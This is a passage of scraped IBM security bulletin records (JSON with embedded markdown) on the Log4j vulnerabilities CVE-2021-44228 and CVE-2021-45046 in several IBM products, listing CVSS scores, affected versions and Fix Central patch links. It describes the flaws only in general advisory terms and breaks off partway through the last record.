\n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n21 Dec 2021: Initial Publication \n22 Dec 2021: Add patch links for 3.1.1, 3.1.2, 3.2.0 \n18 Jan 2022: Add patch link for 3.1.0\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSBS6K\",\"label\":\"IBM Cloud Private\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"all\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T12:22:10", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Cloud Private (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-27T12:22:10", "id": "6CC386F9299ECFE5F62C9D0954CED9917B32A3DFEB8BC98C8212D83DD7B53DF6", "href": "https://www.ibm.com/support/pages/node/6529452", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T23:35:27", "description": "## Summary\n\nAn Apache Log4j vulnerability allowing a remote attacker to execute arbitraty code on the system was addressed by IBM Secure Proxy.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Secure Proxy| 3.4.3.2 \nIBM Secure Proxy| 6.0.2 \nIBM Secure Proxy| 6.0.3 \n \n\n\n## Remediation/Fixes\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Secure Proxy| 6.0.3| iFix 01 Plus| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Secure Proxy| 6.0.2| iFix 04 Plus| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling Secure Proxy| 3.4.3.2| iFix 13 Plus| [Fix Central - 3432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=3.4.3.2&platform=All&function=all> \"Fix Central - 3432\" ) \n \nThe fixes above supply Apache Log4j 2.16.0 which remediates both CVE-2021-44228 and CVE-2021-45046. The Fix Central - 6030 link also points to a fix called SSP-log4j-2.16.0-jars-for-CVE-2021-45046 which supplies the jars and instructions to replace them. \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"6.0.3, 6.0.2, 3.4.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T04:01:02", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Secure Proxy (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-21T04:01:02", "id": "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "href": "https://www.ibm.com/support/pages/node/6528796", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T23:39:29", "description": "## Summary\n\nAn Apache Log4j vulnerability allowing a remote attacker to execute arbitraty code on the system was addressed by IBM Secure External Authentication Server.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Secure External Authentication Server| 6.0.3 \nIBM Secure External Authentication Server| 6.0.2 \n \n\n\n## Remediation/Fixes\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Secure External Authentication Server| 6.0.3| iFix 01 Plus| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nThe fixes above supply Apache Log4j 2.16.0 which remediates both CVE-2021-44228 and CVE-2021-45046. The link [Fix Central SSP 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central SSP 6030\" ) also points to a fix called SSP-log4j-2.16.0-jars-for-CVE-2021-45046 which supplies the jars and instructions to replace them on SSP or SEAS. \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"Sterling External Authentication Server\",\"Platform\":[{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"6.0.3, 6.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T03:55:44", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Secure External Authentication Server (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-21T03:55:44", "id": "18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5", "href": "https://www.ibm.com/support/pages/node/6528794", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T23:39:38", "description": "## Summary\n\nApache Log4j vulnerability CVE-2021-45046 was addressed by IBM Secure External Authentication Server. Customers are encourages to take action and apply the fix below. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Product(s)**| **Version(s)** \n---|--- \nIBM Secure External Authentication Server| 6.0.3 \nIBM Secure External Authentication Server| 6.0.2 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by applying the appropriate fix below.**\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Secure External Authentication Server| 6.0.3| iFix 01 Plus| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \n \nThe fixes above supply Apache Log4j 2.16.0 which remediates both CVE-2021-44228 and CVE-2021-45046. The [Fix Central - SSP 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - SSP 6030\" ) link also points to a fix called SSP-log4j-2.16.0-jars-for-CVE-2021-45046 which supplies the jars and instructions to replace them.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"Sterling External Authentication Server\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"6.0.3, 6.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T21:23:06", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Secure External Authentication Server (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-21T21:23:06", "id": "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "href": "https://www.ibm.com/support/pages/node/6529538", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T23:34:53", "description": "## Summary\n\nAn Apache Log4j vulnerability allowing a remote attacker to execute arbitrary code on the system was addressed by IBM Secure Proxy.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Secure Proxy| 3.4.3.2 \nIBM Secure Proxy| 6.0.2 \nIBM Secure Proxy| 6.0.3 \n \n\n\n## Remediation/Fixes\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Secure Proxy| 6.0.3| iFix 01 Plus| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Secure Proxy| 6.0.2| iFix 04 Plus| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling Secure Proxy| 3.4.3.2| iFix 13 Plus| [Fix Central - 3432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=3.4.3.2&platform=All&function=all> \"Fix Central - 3432\" ) \n \nThe fixes above supply Apache Log4j 2.16.0 which remediates both CVE-2021-44228 and CVE-2021-45046. The Fix Central - 6030 link also points to a fix called SSP-log4j-2.16.0-jars-for-CVE-2021-45046 which supplies the jars and instructions to replace them. \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"6.0.3,6.0.2,3.4.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T21:33:12", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Afffects IBM Secure Proxy (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-21T21:33:12", "id": "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "href": "https://www.ibm.com/support/pages/node/6529556", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-28T23:39:40", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library. The library is used by Elasticsearch, a dependency of IBM Cloud Private, for logging messages to files. This bulletin identifies the security fixes to apply to address the Log4Shell vulnerability (CVE-2021-44228). \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Cloud Private| 3.1.0 \nIBM Cloud Private| 3.1.1 \nIBM Cloud Private| 3.1.2 \nIBM Cloud Private| 3.2.0 \nIBM Cloud Private| 3.2.1 CD \nIBM Cloud Private| 3.2.2 CD \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\nThe recommended solution involves the IBM Cloud Private ibm-icplogging component. It is recommended that you follow the instructions for the component in the links listed below:\n\nFor IBM Cloud Private 3.1.0: [IBM Cloud Private 3.1.0 Patch](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.0-build600961-51486&includeSupersedes=0> \"IBM Cloud Private 3.1.0 Patch\" )\n\nFor IBM Cloud Private 3.1.1: [IBM Cloud Private 3.1.1 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.1-build600916-51406&includeSupersedes=0> \"IBM Cloud Private 3.1.1 Patch\" )\n\nFor IBM Cloud Private 3.1.2: [IBM Cloud Private 3.1.2 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.2-build600891-51342&includeSupersedes=0> \"IBM Cloud Private 3.1.2 Patch\" )\n\nFor IBM Cloud Private 3.2.0: [IBM Cloud Private 3.2.0 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.0-build600917-51405&includeSupersedes=0> \"IBM Cloud Private 3.2.0 Patch\" )\n\nFor IBM Cloud Private 3.2.1: [IBM Cloud 